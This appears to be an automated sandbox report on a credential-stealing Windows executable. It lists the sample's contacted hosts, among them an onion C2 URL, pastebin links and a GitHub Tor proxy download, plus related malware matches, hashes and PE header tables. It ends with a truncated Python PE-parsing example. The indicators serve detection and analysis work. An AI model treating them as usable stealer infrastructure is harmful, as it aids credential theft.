http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa | 2% | Virustotal | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
t.me | 149.154.167.99 | true | false | - | high
ip-api.com | 208.95.112.1 | true | false | - | high
pastebin.com | 172.67.34.170 | true | false | - | high
Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/json | false | - | high
https://pastebin.com/raw/X2Ddjiv0 | false | - | high
https://t.me/tor_proxies | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.entrust.net/server1.crl0 | Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://web.telegram.org | Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pastebin.comp | Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net03 | Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa | Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | true | 2% (Virustotal); Avira URL Cloud: malware | unknown
https://pastebin.com/raw/X2Ddjiv0p | Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://support.google.com/chrome/?p=plugin_flash | Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://t.me/tor_proxiesp | Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/L1ghtM4n/TorProxy/blob/main/LIB/Tor.zip?raw=true | Stealer.exe | false | - | high
https://www.google.com/favicon.ico | Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cdn5.cdn-telegram.org/file/urI_EKpgc2j3bnVEG7hJPiftbxwqp29Csge9PUwai_V9SyHDH8vYkc30DN237hWwA | Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pastebin.com/raw/cription | Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com | Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://pastebin.com/raw/ | Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://t.me | Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://t.mep | Stealer.exe, 00000000.00000002.466413641.00000000023AD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://secure.comodo.com/CPS0 | Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF1B000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://pastebin.com | Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://t.me | Stealer.exe, 00000000.00000002.466413641.00000000023AD000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://pastebin.com | Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.entrust.net/2048ca.crl0 | Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
172.67.34.170 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | false
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
188.166.166.142 | unknown | Netherlands | 14061 | DIGITALOCEAN-ASNUS | false
IP
127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1417452
Start date and time: 2024-03-29 10:30:02 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Stealer.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@15/0@5/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 16
• Number of non-executed functions: 7
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
10:30:44 | API Interceptor | 969x Sleep call for process: Stealer.exe modified
10:30:47 | API Interceptor | 3x Sleep call for process: netsh.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | DHL_LHER000678175.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | assento 555 pro-Model-2.vbs | malicious | AgentTesla, GuLoader | ip-api.com/line/?fields=hosting
208.95.112.1 | ocrev ns.ordine 290520280324.vbs | malicious | AgentTesla, GuLoader | ip-api.com/line/?fields=hosting
208.95.112.1 | YPT23-117419 numaral#U0131 Dekont-20240328.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | FedEx_AWB#53203024643.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | QUOTATION_MARQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | T_240369_S#U0130PAR#U0130S.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | QUOTATION_MARQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exe | malicious | PureLog Stealer, Xehook Stealer | ip-api.com/json/?fields=11827
208.95.112.1 | x.exe | malicious | AgentTesla, PureLog Stealer, RedLine | ip-api.com/line/?fields=hosting
172.67.34.170 | SecuriteInfo.com.Win32.Evo-gen.26417.20881.exe | malicious | AsyncRAT | pastebin.com/raw/KKpnJShN
172.67.34.170 | file.exe | malicious | RedLine | pastebin.com/raw/r0KhEEzi
172.67.34.170 | file.exe | malicious | RedLine | pastebin.com/raw/r0KhEEzi
172.67.34.170 | taRcbIUWK9.vbe | malicious | MailPassView | pastebin.com/raw/zye80t2a
172.67.34.170 | fv7gA5kh4j.exe | malicious | RedLine, Xmrig | pastebin.com/raw/r0KhEEzi
172.67.34.170 | SecuriteInfo.com.Trojan.Heur2.sNW@If4VDppi.27877.25664.exe | malicious | Unknown | pastebin.com/raw/r0KhEEzi
172.67.34.170 | file.exe | malicious | RedLine | pastebin.com/raw/r0KhEEzi
172.67.34.170 | vhQgySRol1.exe | malicious | RedLine | pastebin.com/raw/r0KhEEzi
172.67.34.170 | SrfFpGhGIc.exe | malicious | VjW0rm, WSHRAT | pastebin.com/raw/WVFt9GbZ
172.67.34.170 | Y9IlbIEYjk.exe | malicious | VjW0rm, WSHRAT | pastebin.com/raw/A2n1xGpr
Match | Associated Sample Name / URL | Detection | Threat Name | Context
t.me | https://crm.mr.bet/track/click/c95d3si4y/c6561686462716b65686f62737c6569704564657e23756c6b69627b6e23616?target=https%3A%2F%2Fcrm.mr.bet%2Funsubscribe%2Findex%2FeyJtYWlsIjoibGVhaGRyYWtlaG9yc2xleUBlZHUuc2Vsa2lyay5jYSIsInByb2plY3QiOjMsImJ1bGsiOjYzNjg3MjIsInNpZ24iOiJDQVRQRjhRdzRRcXBpK2tcL2RFckprVmY4N0hrPSJ9 | malicious | Unknown |
                                                                            • 149.154.167.99
                                                                            nUswWbPPmT.ocx.dllGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            nUswWbPPmT.ocx.dllGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            Incident_Report_Harassment_by_Employee.docGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            Incident_Report_Harassment_by_Employee.docGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            https://drive.google.com/file/d/1mEtwMuIQi_Lxv2UbohD3NjVhr3AzgDZX/view?usp=drive_webGet hashmaliciousQuasarBrowse
                                                                            • 172.67.191.176
                                                                            https://xsptsdj.cn/Get hashmaliciousUnknownBrowse
                                                                            • 151.101.1.195
                                                                            https://frz.ywv.mybluehost.me/myBRT/home/paket.phpGet hashmaliciousUnknownBrowse
                                                                            • 162.241.225.39
                                                                            dump2_cut.exeGet hashmaliciousRaccoonBrowse
                                                                            • 172.67.173.121
                                                                            dump2_cut.exeGet hashmaliciousRaccoonBrowse
                                                                            • 104.21.30.173
                                                                            ip-api.comDHL_LHER000678175.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            assento 555 pro-Model-2.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 208.95.112.1
                                                                            ocrev ns.ordine 290520280324.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 208.95.112.1
                                                                            YPT23-117419 numaral#U0131 Dekont-20240328.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            FedEx_AWB#53203024643.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            QUOTATION_MARQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            T_240369_S#U0130PAR#U0130S.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            QUOTATION_MARQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exeGet hashmaliciousPureLog Stealer, Xehook StealerBrowse
                                                                            • 208.95.112.1
                                                                            x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                            • 208.95.112.1
                                                                            pastebin.cominvoicee.vbsGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            chrome.exeGet hashmaliciousXWormBrowse
                                                                            • 172.67.34.170
                                                                            UU5WXfH85a.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            • 172.67.34.170
                                                                            WKn5bYRJGH.exeGet hashmaliciousLimeRATBrowse
                                                                            • 172.67.34.170
                                                                            857SmDlK42.exeGet hashmaliciousUnknownBrowse
                                                                            • 104.20.68.143
                                                                            857SmDlK42.exeGet hashmaliciousDCRatBrowse
                                                                            • 172.67.34.170
                                                                            https://drive.google.com/file/d/1Y8n0jZgokB9jmAStRSvrj63LyXRj9rrA/view?usp=drive_webGet hashmaliciousQuasarBrowse
                                                                            • 172.67.34.170
                                                                            762544342.vbsGet hashmaliciousXWormBrowse
                                                                            • 172.67.34.170
                                                                            2132544253.vbsGet hashmaliciousXWormBrowse
                                                                            • 104.20.68.143
                                                                            #U7a3d.#U67e5.#U4f01.#U4e1a.#U540d.#U5355.#U624b#U518c.exeGet hashmaliciousUnknownBrowse
                                                                            • 104.20.67.143
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSMXpl6HFisn.exeGet hashmaliciousRisePro StealerBrowse
                                                                            • 104.26.5.15
                                                                            https://airdrop-online-altlayer-anniversary.s3.us-east-2.amazonaws.com/posten.html?cid=freetomfr@hotmail.comGet hashmaliciousPhisherBrowse
                                                                            • 172.64.150.248
                                                                            7ITPeT3VWW.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.38.98
                                                                            l2ZKczbGRq.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                            • 104.26.4.15
                                                                            XqC4Zcp8qg.exeGet hashmaliciousRisePro StealerBrowse
                                                                            • 104.26.5.15
                                                                            3MdZ1WiAYP.exeGet hashmaliciousRisePro StealerBrowse
                                                                            • 172.67.75.166
                                                                            7GofFHQDvk.exeGet hashmaliciousRisePro StealerBrowse
                                                                            • 172.67.75.166
                                                                            TBC#01 Rev.A3 - lnexa.xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 104.26.12.205
                                                                            DHL_LHER000678175.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 172.67.74.152
                                                                            inpau292101.jsGet hashmaliciousFormBookBrowse
                                                                            • 172.67.215.45
                                                                            TELEGRAMRUSecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeGet hashmaliciousClipboard Hijacker, XWorm, XmrigBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exeGet hashmaliciousDiscord Token Stealer, XenoRAT, XmrigBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                            • 149.154.167.220
                                                                            aMObJ2eTUf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRATBrowse
                                                                            • 149.154.167.220
                                                                            iY40ylvr5y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            • 149.154.167.220
                                                                            DHL9407155789...exeGet hashmaliciousDarkCloudBrowse
                                                                            • 149.154.167.220
                                                                            https://moodle-projects.wolfware.ncsu.edu/Shibboleth.sso/Logout?return=https://owa-storage-limitt.s3.us-east-2.amazonaws.com/owa-2024.html?uid=dGVzdEB0ZXN0LmNvbQoGet hashmaliciousHTMLPhisherBrowse
                                                                            • 149.154.167.220
                                                                            lnvoice-1445766252.pdf.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                            • 149.154.167.220
                                                                            JUSTIF.TRANSF..exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 149.154.167.220
                                                                            DIGITALOCEAN-ASNUSMcb5K3TOWT.exeGet hashmaliciousUnknownBrowse
                                                                            • 37.139.22.180
                                                                            mips.elfGet hashmaliciousMiraiBrowse
                                                                            • 139.59.86.211
                                                                            https://ckydb04.na1.hubspotlinks.com/Ctc/OP+113/cKydB04/VW9bQw4skpv3N4QMDhk6pMpJW5g6HvJ5ccjQdN61zzVd3qn9gW7lCdLW6lZ3m-VBhZqP2fNwFyN40GRrrMQlZ-N2TdQmJ13Y6QW10XVPX3kbMHcN4L237-7KHZ5W1zLF7f8GbdtBW2ZKqmb4N84ZcW3QDpzS6S7KJJW5X7x_l7b4v9TW2F362D3Hh1s9W54lklM4T0vLxN7h7S8FNlcHjW20Y8Mn2bFBzVW9hqyrD48FY07W1SGLwZ5DF_9-W40HntB7qL0THW1mF8BY3vVj3gW2n5NX74XPrGTW45qZ3V6l-BrTN7CsbcvdfdyCW5951f94y1-HGN8ZFSwmVlSf3W5fSXSN3-n9KQW8hNdv46-Q6rkf7QDZST04Get hashmaliciousUnknownBrowse
                                                                            • 174.138.88.94
                                                                            https://mnrdtfqrcyfqiou.s3.amazonaws.com/mnrdtfqrcyfqiou.html#4HHHnO7279bGJq492fumheqtoju1686NCUIKVMPNMDQVMT689230/736882Y21#qgow23ahs76jjbq8j26ouc8n3ucpjfst25g85oeaei03mafty5n389rGet hashmaliciousHTMLPhisherBrowse
                                                                            • 167.71.30.39
                                                                            cvdLNZXNPZ.elfGet hashmaliciousMiraiBrowse
                                                                            • 165.23.95.65
                                                                            SecuriteInfo.com.Trojan.Siggen10.9096.15276.30319.exeGet hashmaliciousNjratBrowse
                                                                            • 157.245.191.173
                                                                            SecuriteInfo.com.FileRepMalware.20494.7181.exeGet hashmaliciousXmrigBrowse
                                                                            • 178.128.242.134
                                                                            f699.jsGet hashmaliciousUnknownBrowse
                                                                            • 164.90.149.198
                                                                            AhbJkpk3Z8.elfGet hashmaliciousUnknownBrowse
                                                                            • 134.209.44.115
                                                                            https://bafkreiakypngf5p2vusgmzt3htrul7f7hmhpylofrop6cg6waka2djtzz4.ipfs.dweb.link/#katja.lundberg-rand@daiichi-sankyo.euGet hashmaliciousUnknownBrowse
                                                                            • 134.122.57.34
                                                                            TUT-ASUSDHL_LHER000678175.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            assento 555 pro-Model-2.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 208.95.112.1
                                                                            ocrev ns.ordine 290520280324.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 208.95.112.1
                                                                            YPT23-117419 numaral#U0131 Dekont-20240328.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            FedEx_AWB#53203024643.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            QUOTATION_MARQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            T_240369_S#U0130PAR#U0130S.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            QUOTATION_MARQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exeGet hashmaliciousPureLog Stealer, Xehook StealerBrowse
                                                                            • 208.95.112.1
                                                                            x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                            • 208.95.112.1
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            7dcce5b76c8b17472d024758970a406bRFQ.docGet hashmaliciousAgentTeslaBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            New Order 3118.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            New Order 3118.docGet hashmaliciousAgentTeslaBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            New Order 67789034.docGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            RFQ No. 5490490.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            RFQ No. 5490490.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            New Order 3118.rtfGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            Incident_Report_Harassment_by_Employee.docGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            #1337.docGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            1.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.640265630210374
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: Stealer.exe
File size: 344'064 bytes
MD5: 495f88115eabed181e30727f2d2363d3
SHA1: 59cd87a7e30926fc7c51a921b78216119f9d4f1c
SHA256: cfef836fa4515f5371b8a30300098bdb03d4c91b123f0a35252757bc73b388f2
SHA512: f71afad61cca5a15cb01a4aa342d92710c4d5c72c1b5d059f1bd63238d5a768e9c495fb5632ebfcae086b8e994076e26b1e557139cfd8303c26e8b2b1811a2a8
SSDEEP: 3072:hJucc5yxBhJNfx53RJTpB+d9IIYFNnFqhGCFbcnEGTUU8aJc/HUexspPyEVCYdXY:hJuE/FkiTaiDy+rztBRBwFbo5VdJ
TLSH: 2B74A72837994729E1B4273D4C37233293B523536F17730AAA4370A52951ABD9D0BAFF
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T............"...0..4...........S... ...`....@.. ....................................`................................
Icon Hash: aaf3e3e3918382a0
Entrypoint: 0x4553de
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x81805410 [Sat Nov 6 15:43:12 2038 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x55384 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x56000 | 0x612 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x58000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x533e4 | 0x53400 | 93c0df87a9164bbce13b1ff10a324279 | False | 0.4601192989864865 | data | 5.656298703669978 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x56000 | 0x612 | 0x800 | 693bc77a0c1a5ca627b1d62d880e0a91 | False | 0.34228515625 | data | 3.545184940020113 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x58000 | 0xc | 0x200 | 30edaabb71d7d449943a334cf07dd46d | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x560a0 | 0x388 | data | | | 0.4358407079646018
RT_MANIFEST | 0x56428 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
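The data-directory, section and import tables above together identify the sample as a managed (.NET) executable: the only import is mscoree.dll!_CorExeMain and the COM_DESCRIPTOR (CLR header) directory is populated at RVA 0x2008 inside .text. The Python below is an added example written for this page (not Joe Sandbox's code): with only the standard library it walks a PE32 image's headers, maps each directory RVA to its section as the "Is in Section" column does, computes the per-section Shannon entropy the Entropy column reports, decodes the section characteristics, and flags the CLR header. It runs against a constructed minimal PE fixture whose directory and section RVAs copy the report's values but whose raw bytes, linker fields and entry point are synthetic (an assumption, so its entropies and MD5s will not match the report); pass a real file's bytes to parse_pe to use it on a sample.

```python
import math
import struct
from collections import Counter

# Order of the 16 IMAGE_DIRECTORY_ENTRY_* slots in the optional header
# (slot 7 is ARCHITECTURE; the report labels it COPYRIGHT).
DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG",
    "BOUND_IMPORT", "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]
SECTION_FLAGS = [(0x20, "IMAGE_SCN_CNT_CODE"), (0x40, "IMAGE_SCN_CNT_INITIALIZED_DATA"),
                 (0x80, "IMAGE_SCN_CNT_UNINITIALIZED_DATA"), (0x02000000, "IMAGE_SCN_MEM_DISCARDABLE"),
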